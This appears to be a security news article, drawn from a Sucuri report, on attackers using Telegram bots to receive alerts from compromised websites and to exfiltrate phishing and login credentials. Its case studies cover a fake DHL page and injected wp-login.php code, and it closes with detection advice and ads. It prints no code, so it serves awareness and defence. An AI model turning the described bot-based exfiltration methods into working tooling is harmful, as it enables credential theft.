Telegram, synonymous with secure messaging, has paradoxically become a tool for cybercriminals who abuse the platform’s strengths to target unsuspecting websites.
Once known for its commitment to user privacy and security, this popular messaging platform is now used in ways its creators never intended: as a conduit for controlling malware-infected websites.
The Misuse of Telegram in Website Malware
According to the Sucuri blog, Telegram’s versatility as a messaging app is undisputed: the app has numerous features that cater to both privacy and flexibility.
However, these qualities have attracted a less savory user base — cybercriminals.
One of the primary ways attackers use Telegram is to receive notifications about the status of their malware.
Once a website is compromised, a Telegram bot can alert the attacker and provide real-time updates about the infected site.
This includes alerts when new data is captured, additional malware is successfully implanted, or an administrator interacts with the infected parts of the website.
Data Exfiltration
Telegram bots are often configured to exfiltrate stolen data directly to the attacker’s Telegram account.
This can include sensitive user information, login credentials, and financial data.
All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo
The speed and encryption of Telegram ensure that this stolen data is moved quickly and covertly, often bypassing traditional security measures designed to monitor and block suspicious data flows.
Traditionally, malware requires a command and control (C&C) server to receive updated commands and to manage the infected systems. Telegram provides a stealthier alternative.
Through simple messages, attackers can command their deployed malware to download additional components, spread to other network parts, or even initiate a denial-of-service attack.
Telegram simplifies the infrastructure required for such operations and reduces the risk of exposing the C&C servers to law enforcement and cybersecurity experts.
Telegram’s strong encryption and privacy policies mean tracing these activities back to their perpetrators is difficult.
Attackers hide behind the veil of anonymity, complicating efforts by law enforcement and researchers to track and neutralize threats.
Last year, our research team found numerous malware infections leveraging Telegram in their website attacks.
We cleaned over 11,000 malicious files from over 290 infected websites related to this malware.
Case Studies
Case Study 1: Monitoring and Notification System
We occasionally find attackers using Telegram bots to receive real-time notifications about their malware’s status on compromised websites, including alerts on new data capture, additional malware implants, and administrator interactions.
The malware uses a bot to authenticate via Telegram’s bot_token and then uses chat_id to send the website’s URL, name, and admin email address to a specific chat room where the attacker can collect and use those details.
Case Study 2: Phishing for Credit Card Details
Attackers often use malicious PHP scripts on compromised websites to harvest and send stolen credentials and sensitive data to their servers.
However, due to its encrypted messaging service, we’ve recently seen a surge in the use of the Telegram API for data exfiltration.
During an investigation, we encountered a phishing page mimicking DHL, a global courier service.
The fake page was designed to look like a legitimate DHL tracking page with similar colors, fonts, and styles.
Whenever a form submission occurs on any of the steps, JavaScript gathers the data and sends it to the Telegram bot through a Herokuapp-hosted service.
This approach allows the attackers to leverage the legitimate Roku service to avoid detection, marking a sophisticated evolution in phishing techniques.
Case Study 3: Phishing for Login Credentials
In another recent example, attackers exploited the Telegram API to facilitate a phishing scam.
They created a mailer script that used Telegram to transmit stolen data such as addresses, emails, mobile numbers, and IP addresses directly to the attacker.
The most frequently detected phishing script with Telegram exfiltration was found in telegram_bot.php files inside various phishing sub-directories.
This method of communication streamlines the process of collecting and exploiting sensitive user information and allows the attacker to get instant notifications so they can use the stolen credentials before any suspecting user has a chance to change them or their organization detects any suspicious activity.
Case Study 4: Server-side Data Exfiltration
Attackers are continually finding ingenious ways to steal data from compromised websites.
In recent years, attackers have been exploiting communication systems like the Telegram API for data exfiltration from the website’s server.
This allows attackers to send stolen data directly to a bot, making detection more challenging and providing real-time access to the compromised information.
One notable example involves an attack on a WordPress site where malicious code was injected into the wp-login.php file.
This code captured login credentials each time a user attempted to log in and sent the stolen data to a Telegram bot.
While other messaging apps like WhatsApp and Signal also offer encryption, Telegram’s unique features make it particularly appealing to bad actors:
- Telegram’s API is more accessible and allows more extensive automation of functions, making it easier for attackers to deploy bots.
- Telegram offers much greater anonymity than other platforms, which require a phone number linked directly to a user.
- WhatsApp and Signal encrypt messages but do not offer the same level of anonymity or API flexibility, which are key for orchestrating and managing cyberattacks without revealing identity.
Addressing the Threat
To detect and protect against Telegram-based malware, website administrators can adopt several strategies:
- Regularly analyze network traffic for any connections to Telegram API endpoints, which could signal unauthorized use.
- Check server logs for unusual activities, such as unexpected outgoing connections or unusual data payloads being sent.
- Install advanced website security monitoring that uses anomaly detection algorithms to flag and identify unusual behavior.
- Use a web application firewall and intrusion detection system (IDS) to identify and mitigate threats.
- Regularly keep all systems and software patched with the latest updates to close vulnerabilities that attackers could exploit.
While Telegram is well-known for its secure messaging capabilities, bad actors are exploiting its features to conduct sophisticated attacks on websites.
There is no perfect solution to prevent this. However, Telegram should look into resolving this and seeking ways to prevent abuse of its platform without impacting its core principle of privacy.
Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.